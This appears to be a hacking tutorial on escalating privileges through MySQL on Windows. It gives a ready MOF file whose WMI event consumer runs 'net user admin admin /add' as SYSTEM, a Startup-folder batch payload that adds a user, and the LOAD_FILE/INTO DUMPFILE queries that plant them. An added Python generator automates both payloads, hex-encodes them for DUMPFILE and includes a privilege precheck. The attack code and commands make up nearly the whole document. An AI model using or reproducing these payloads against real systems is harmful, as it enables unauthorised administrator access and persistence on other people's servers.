How to exploit MOF privilege escalation
Save the following code as a .mof file:
#pragma namespace("\\\\.\\root\\subscription")

// Filter: fires whenever the local clock's seconds field reads 5, i.e. once a minute.
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

// Consumer: JScript that the WMI service runs (as SYSTEM) each time the filter fires.
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
        "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};

// Binding: ties the filter to the consumer so the subscription becomes active.
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
Then run the following in MySQL to copy the file onto the target via a query (this needs the FILE privilege, secure_file_priv not excluding the target path, and mysqld running as an account that can write to system32, typically LocalSystem):
select load_file('<path to the .mof file>') into dumpfile 'c:/windows/system32/wbem/mof/<your file name>.mof';
Once the write succeeds, the WMI service compiles the file on its own: the filter fires once a minute and the JScript consumer runs net.exe as SYSTEM, so the admin account is created with no further interaction. Automatic compilation of files dropped into wbem\mof exists on Windows XP / Server 2003 only; later versions no longer process that directory.
Startup-folder privilege escalation
@echo off
rem runs with the privileges of whichever user logs on next
net user dodo dodo /add
Save the code as a .bat file.
Write it to the Startup folder via a query:
select load_file('<path to the .bat file>') into dumpfile '<path to the system's Startup folder>/<your file name>.bat';
It takes effect the next time a user logs on (for example after a reboot). The batch file runs with that user's privileges, so the account is only created once an administrator logs on.
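An added example, not part of the original notes, that generates both payloads described above and the MySQL statements to write them. It makes the two layers of string escaping explicit (the command sits inside a JScript literal, which sits inside a MOF literal), which the hand-written .mof hides, and, going beyond the notes, writes the file content as a hex literal with SELECT 0x... INTO DUMPFILE, so the payload does not have to exist on the MySQL host first as LOAD_FILE requires. The target file names and Startup folder path in the demo are assumptions.

```python
"""Generate the MOF and .bat payloads from the notes and the MySQL statements
that write them to the target's disk.  Added example, not part of the original
notes.  Paths and file names used in the demo at the bottom are assumptions.
"""

# Same MOF as in the notes; __SCRIPT__ is replaced with the escaped JScript.
MOF_TEMPLATE = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "__SCRIPT__";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
'''

# Run this first: the attack needs the FILE privilege, secure_file_priv empty
# (or naming a directory that contains the target path), and mysqld running
# as an account that can write to the target directory.
PRECHECK_SQL = ("SELECT @@secure_file_priv, @@datadir, @@version_compile_os; "
                "SHOW GRANTS FOR CURRENT_USER();")


def js_string(s):
    """Escape s for the inside of a JScript double-quoted string literal."""
    return s.replace("\\", "\\\\").replace('"', '\\"')


def mof_string(s):
    """Escape s for the inside of a MOF double-quoted string literal.
    MOF uses C-style escapes, so the JScript text gets escaped a second time."""
    return s.replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n")


def build_jscript(command):
    """The two-line JScript body from the notes, with an arbitrary command."""
    return 'var WSH = new ActiveXObject("WScript.Shell")\nWSH.run("%s")' % js_string(command)


def build_mof(command):
    """Complete .mof: filter (once a minute) -> JScript consumer -> binding."""
    return MOF_TEMPLATE.replace("__SCRIPT__", mof_string(build_jscript(command)))


def build_bat(command):
    """Startup-folder payload; runs with the privileges of whoever logs on next."""
    return "@echo off\r\n%s\r\n" % command


def sql_string(s):
    """MySQL string literal.  Backslash is MySQL's escape character, so Windows
    paths must be doubled (or written with forward slashes)."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def dumpfile_sql(content, remote_path):
    """Write content byte-for-byte from a hex literal.  Unlike LOAD_FILE this
    does not need the payload on the MySQL host first.  DUMPFILE refuses to
    overwrite an existing file, so pick a fresh name."""
    return "SELECT 0x%s INTO DUMPFILE %s;" % (content.hex(), sql_string(remote_path))


def loadfile_sql(local_path, remote_path):
    """The notes' variant: copy a file that mysqld can already read."""
    return "SELECT LOAD_FILE(%s) INTO DUMPFILE %s;" % (
        sql_string(local_path), sql_string(remote_path))


if __name__ == "__main__":
    print(PRECHECK_SQL)
    # Assumed file name; wbem\mof is only auto-compiled on Windows XP / Server 2003.
    mof = build_mof("net.exe user admin admin /add")
    print(dumpfile_sql(mof.encode(), r"C:\Windows\System32\wbem\mof\nullevt.mof"))
    # Assumed all-users Startup folder path (Windows XP / 2003 layout) and file name.
    bat = build_bat("net user dodo dodo /add")
    print(dumpfile_sql(bat.encode(),
          r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\dodo.bat"))
```

The hex-literal form also sidesteps the quoting problems of pasting the .mof into a string literal, and the same dumpfile_sql call serves both the MOF and the Startup-folder variant.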